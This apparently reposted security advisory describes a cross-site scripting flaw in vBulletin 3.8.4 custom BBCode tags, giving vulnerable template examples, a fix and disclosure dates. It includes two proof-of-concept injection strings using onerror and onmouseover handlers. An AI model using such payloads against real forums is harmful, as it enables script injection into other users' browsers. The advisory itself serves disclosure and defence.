BLOG OF H7T_2002

Bạn có muốn phản ứng với tin nhắn này? Vui lòng đăng ký diễn đàn trong một vài cú nhấp chuột hoặc đăng nhập để tiếp tục.
BLOG OF H7T_2002

Trang cá nhân của H7T_2002++


    vBulletin - Insecure Custom BBCode Tags

    avatar
    h7t_2002
    --[DEVELOPER]--
    --[DEVELOPER]--


    Tổng số bài gửi : 67
    Join date : 01/06/2009
    Age : 33
    Đến từ : /dev/null

    vBulletin - Insecure Custom BBCode Tags Empty vBulletin - Insecure Custom BBCode Tags

    Bài gửi by h7t_2002 Mon Jul 12, 2010 7:18 am

    Versions Affected: 3.8.4 PL2 (Most likely all versions)

    Info:
    Content publishing, search, security, and more—vBulletin has it all. Whether
    it’s available features, support, or ease-of-use, vBulletin offers the most for
    your money. Learn more about what makes vBulletin the choice for people
    who are serious about creating thriving online communities.

    External Links:
    http://www.vbulletin.com/



    -:: The Advisory ::-

    A vulnerability exists within vBulletin which makes an attacker able to inject
    code such as HTML or Javascript via custom BBCode Tags IF they follow certain
    conditions which are described below.

    Requirements:
    - User-input must be located inside a variable in a HTML-tag.
    - Apostrophes or nothing must be used for encapsulation.


    Insecure Implementations:

    - Example 1 (src is insecure)
    Code:
    <img src='{param}' style='border-width:5px;border-color:red;border-style:outset;' />

    - Example 2 (href is insecure)
    Code:
    <a href={option} style=border-width:5px;border-color:red;border-style:outset;>{param}</a>


    Exploitation of Above Implementations:

    - Example 1 (PoC)
    Code:
    [BadTag]x:x' onerror=alert(0) foo='[/BadTag]

    - Example 2 (PoC)
    Code:
    [BadTag2=fail onmouseover=alert(0)]Link[/BadTag2]



    -:: Solution ::-

    Sanitize BBCode with htmlentities($var, ENT_QUOTES); or htmlspecialchars($var); in the PHP files.
    (Jelsoft should fix this, however I may provide a patch if they don't.)

    Alternatively don't use BBCode with apostrophes where user-input is inside a variable.

    Examples of "Secure Implementation":
    Code:
    <img src="{param}" style='border-width:5px;border-color:red;border-style:outset;' />
    [ + ] Note that src's value is encapsulated with quotes.

    Code:
    <a href="{option}" style=border-width:5px;border-color:red;border-style:outset; />{param}</a>
    [ + ] Note that href's value is encapsulated with quotes.


    Disclosure Information:
    - Vulnerability found the 29th April 2010
    - Vendor and Buqtraq (SecurityFocus) was contacted the 29th April
    - Disclosed on InterN0T the 29th April

    Reference:
    http://forum.intern0t.net/intern0t-advisories/2528-vbulletin-3-8-4-pl2-insecure-custom-bbcode.html

      Hôm nay: Mon May 20, 2024 8:26 am